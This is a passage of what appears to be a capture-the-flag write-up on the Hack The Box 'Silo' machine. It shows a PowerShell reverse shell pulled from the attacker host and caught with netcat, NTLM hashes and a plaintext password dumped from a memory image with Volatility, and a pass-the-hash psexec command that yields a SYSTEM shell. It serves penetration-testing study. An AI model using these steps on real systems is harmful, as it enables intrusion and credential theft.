10.10.10.82 - - [25/Feb/2022 08:29:31] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -
$ rlwrap nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.82] 49168
Windows PowerShell running as user SILO$ on SILO
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
whoami
iis apppool\defaultapppool
PS C:\windows\system32\inetsrv>
I got the user flag as well
cd Phineas
cd Desktop
dir
Directory: C:\users\Phineas\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 1/5/2018 10:56 PM 300 Oracle issue.txt
-ar-- 2/25/2022 12:43 AM 34 user.txt
I can see one more file
get-content "oracle issue.txt"
Support vendor engaged to troubleshoot Windows / Oracle performance issue (full memory dump requested):
Dropbox link provided to vendor (and password under separate cover).
Dropbox link
https://www.dropbox.com/sh/69skryzfszb7elq/AADZnQEbbqDoIf5L2d0PBxENa?dl=0
link password:
?%Hm8646uC$
It seems the password does not work while i try to download after searching some forums , i found that the password needs to be copied from windows machine to linux and use the copy option You can see you are missing some characters or symbols which are missing while you copy earlier. Refer the file which has been copied to Kali. Open it with VIM and you will get password
After unzipping it becomes a 1 GB files, if you have space contraints use some smb share to access this.
There is tool Volatility to analayze the mempry dump. However in previous blogs posts it was Volatility2 which was working with python2 and after searching i have found volatility3 which works with python3.
git clone https://github.com/volatilityfoundation/volatility3.git
cd volatility3
python3 setup.py install
python3 vol.py —h
Cloning into 'volatility3'...
remote: Enumerating objects: 26002, done.
remote: Counting objects: 100% (3001/3001), done.
remote: Compressing objects: 100% (1021/1021), done.
remote: Total 26002 (delta 2253), reused 2596 (delta 1968), pack-reused 23001
Receiving objects: 100% (26002/26002), 5.14 MiB | 200.00 KiB/s, done.
Volatility 3 Framework 2.0.2
usage: volatility [-h] [-c CONFIG] [--parallelism [{processes,threads,off}]] [-e EXTEND] [-p PLUGIN_DIRS] [-s SYMBOL_DIRS] [-v] [-l LOG] [-o OUTPUT_DIR] [-q]
[-r RENDERER] [-f FILE] [--write-config] [--clear-cache] [--cache-path CACHE_PATH] [--offline] [--single-location SINGLE_LOCATION]
[--stackers [STACKERS ...]] [--single-swap-locations [SINGLE_SWAP_LOCATIONS ...]]
plugin ...
volatility: error: argument plugin: invalid choice —h (choose from banners.Banners, configwriter.ConfigWriter, frameworkinfo.FrameworkInfo, isfinfo.IsfInfo, layerwriter.LayerWriter, linux.bash.Bash, linux.check_afinfo.Check_afinfo, linux.check_creds.Check_creds, linux.check_idt.Check_idt, linux.check_modules.Check_modules, linux.check_syscall.Check_syscall, linux.elfs.Elfs, linux.keyboard_notifiers.Keyboard_notifiers, linux.kmsg.Kmsg, linux.lsmod.Lsmod, linux.lsof.Lsof, linux.malfind.Malfind, linux.proc.Maps, linux.pslist.PsList, linux.pstree.PsTree, linux.tty_check.tty_check, mac.bash.Bash, mac.check_syscall.Check_syscall, mac.check_sysctl.Check_sysctl, mac.check_trap_table.Check_trap_table, mac.ifconfig.Ifconfig, mac.kauth_listeners.Kauth_listeners, mac.kauth_scopes.Kauth_scopes, mac.kevents.Kevents, mac.list_files.List_Files, mac.lsmod.Lsmod, mac.lsof.Lsof, mac.malfind.Malfind, mac.mount.Mount, mac.netstat.Netstat, mac.proc_maps.Maps, mac.psaux.Psaux, mac.pslist.PsList, mac.pstree.PsTree, mac.socket_filters.Socket_filters, mac.timers.Timers, mac.trustedbsd.Trustedbsd, mac.vfsevents.VFSevents, timeliner.Timeliner, windows.bigpools.BigPools, windows.cachedump.Cachedump, windows.callbacks.Callbacks, windows.cmdline.CmdLine, windows.crashinfo.Crashinfo, windows.dlllist.DllList, windows.driverirp.DriverIrp, windows.driverscan.DriverScan, windows.dumpfiles.DumpFiles, windows.envars.Envars, windows.filescan.FileScan, windows.getservicesids.GetServiceSIDs, windows.getsids.GetSIDs, windows.handles.Handles, windows.hashdump.Hashdump, windows.info.Info, windows.ldrmodules.LdrModules, windows.lsadump.Lsadump, windows.malfind.Malfind, windows.memmap.Memmap, windows.mftscan.MFTScan, windows.modscan.ModScan, windows.modules.Modules, windows.mutantscan.MutantScan, windows.netscan.NetScan, windows.netstat.NetStat, windows.poolscanner.PoolScanner, windows.privileges.Privs, windows.pslist.PsList, windows.psscan.PsScan, windows.pstree.PsTree, windows.registry.certificates.Certificates, windows.registry.hivelist.HiveList, windows.registry.hivescan.HiveScan, windows.registry.printkey.PrintKey, windows.registry.userassist.UserAssist, windows.sessions.Sessions, windows.skeleton_key_check.Skeleton_Key_Check, windows.ssdt.SSDT, windows.statistics.Statistics, windows.strings.Strings, windows.svcscan.SvcScan, windows.symlinkscan.SymlinkScan, windows.vadinfo.VadInfo, windows.vadyarascan.VadYaraScan, windows.verinfo.VerInfo, windows.virtmap.VirtMap, yarascan.YaraScan)
Lets search for command format for Vol3 and i found this.Some cammnds I have tried and results uploaded [here](Rchitect/vol3-output at Yoda · tcprks/Rchitect · GitHub).
python3 vol.py -f /home/rocky/hckbox/silo/dump/SILO-20180105-221806.dmp windows.pslist.PsList
Volatility 3 Framework 2.0.2
python3 vol.py -f /home/rocky/hckbox/silo/dump/SILO-20180105-221806.dmp windows.hashdump.Hashdump
Volatility 3 Framework 2.0.0-beta.1
Volatility 3 Framework 2.0.2
Progress: 100.00 PDB scanning finished
User rid lmhash nthash
Administrator 500 aad3b435b51404eeaad3b435b51404ee 9e730375b7cbcebf74ae46481e07b0c7
Guest 501 aad3b435b51404eeaad3b435b51404ee 31d6cfe0d16ae931b73c59d7e0c089c0
Phineas 1002 aad3b435b51404eeaad3b435b51404ee 8eacdd67b77749e65d3b3d5c110b0969
Volatility: command not found
┌──(rocky㉿kali)-[~/tool/exp/volatility3]
└─$ python3 vol.py -f /home/rocky/hckbox/silo/dump/SILO-20180105-221806.dmp windows.lsadump.Lsadump 127 ⨯
Volatility 3 Framework 2.0.2
Progress: 100.00 PDB scanning finished
Key Secret Hex
DefaultPassword DoNotH@ckMeBro! 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 00 6f 00 4e 00 6f 00 74 00 48 00 40 00 63 00 6b 00 4d 00 65 00 42 00 72 00 6f 00 21 00 00 00
DPAPI_SYSTEM ,Ï%14®C-¬ò§tmC¨¦©Bb÷UpH»}þyI½ 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 cf 25 94 31 34 9e ae 43 2d 8b 87 ac f2 a7 74 1c 6d ec 1c 04 08 43 a8 a6 a9 42 62 f7 55 70 48 bb 17 7d 82 fe 79 49 02 bd 00 00 00 00
Now we have received the hashes and without trying to decrypt. I have decided to used the tool which can be used for reverse shell using hashes
┌──(rocky㉿kali)-[~]
└─$ psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 -dc-ip 10.10.10.82 administrator@10.10.10.82
Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation
[*] Requesting shares on 10.10.10.82.....
[*] Found writable share ADMIN$
[*] Uploading file MfWYdRtt.exe
[*] Opening SVCManager on 10.10.10.82.....
[*] Creating service suTU on 10.10.10.82.....
[*] Starting service suTU.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32>
Key Take-aways Link to heading
The initial nmap scan i used did nit reveal the oracle database ports. I have sepend more time on other services which are not relvaant, In OSCP this can spoil your time. Always run manual scal(sudo nmap -sS -T4 -sV -sC 10.10.10.82) and automatic enumeration scripts like Autorecon during the exams and pentesting.
Another learning from this box is the oracle DB exploit. How the TNS poisoning can be used for Oracle DB exploit. We got to know about the ODAT tool which can be used for DB enumeration and which helped to get initial shell. For priv escalation, we have learned how to use Voltality for analyzing a memory dump files to get sensitive information of the serrvers/systems.